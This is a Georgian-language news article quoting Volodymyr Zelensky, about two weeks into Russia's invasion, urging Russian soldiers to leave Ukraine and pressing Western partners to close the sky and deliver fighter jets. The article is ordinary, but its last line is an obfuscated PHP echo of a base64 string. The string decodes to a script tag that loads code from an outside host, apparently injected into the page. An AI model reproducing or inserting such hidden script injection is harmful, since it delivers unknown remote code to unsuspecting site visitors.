celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი დასავლეთის ქვეყნებს კიდევ ერთხელ მიმართავს და პარტნიორებს უკრაინის თავზე ცის დახურვისაკენ მოუწოდებს.
 
"მივმართავ რუს ჯარისკაცებს, თქვენ კიდევ გაქვთ გადარჩენის შანსი. ჩვენმა წინააღმდეგობამ თითქმის 2 კვირის განმავლობაში დაგანახათ, რომ ჩვენ არ დავნებდებით, რადგან ჩვენ  ვიბრძვით ჩვენი ოჯახების, ბავშვების, სამშობლოს და მიწის გადასარჩენად. ჩვენს მიწას არ დაგითმობთ და არ დაგახოცინებთ, ჩვენს მოქალაქეებს, არ დაგახოცინებთ ჩვენს ბავშვებს.
 
თქვენ უბრალოდ წადით, არ შეასრულოთ თქვენი მეთაურის დავალებები. ჩვენ ვიცით, რომ თქვენთან მეთაურებმა იციან, ომი წაგებულია და ამას არ გეუბნებიან, ამიტომ წადით ჩვენი სამშობლოდან, დაბრუნდით თქვენს სახლებში.
 
14 დღეა გრძელდება მასშტაბური ომი უკრაინის წინააღმდეგ. 14 დღეა ბომბავენ მშვიდობიანი მოქალაქეების საცხოვრებელ სახლებს. უკრაინა, რუსეთის შემოჭრის შემდეგ პირველივე დღიდან მიმართავს პარტნიორებს, თუ ცას არ ჩაკეტავთ, თქვენ იქნებით პასუხისმგებელი იმ ჰუმანიტარულ კატასტროფაზე, რაც უკრაინაში ხდება. რუსეთის ავიაცია ბომბავს საცხოვრებელ კორპუსებს, მშვიდობიან მოქალაქეებს, ანადგურებს ჩვენს სამოქალაქო და სამხედრო ინფრასტრუქტურას.
 
ჩვენ ყველამ ვიცოდით, რომ ამერიკასა და პოლონეთს შორის შეთანხმება შედგა, გადაწყვეტილებები მიღებულია და არ ექვემდებარება გადახედვას, არც ამერიკის და არც პოლონეთის მხრიდან, მაგრამ რატომ არ არის გადაწყვეტილება მიღებული?! ჩვენს ქვეყანაში ომია, ჩვენ არ გვაქვს თავისუფალი დრო... ეს არ არის პინგ-პონგი, აქ საუბარია ადამიანების სიცოცხლეზე, დროულად გადმოგვეცით მოიერიშეები,"-აცხადებს ვოლოდიმირ ზელენსკი.
 
 
779
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");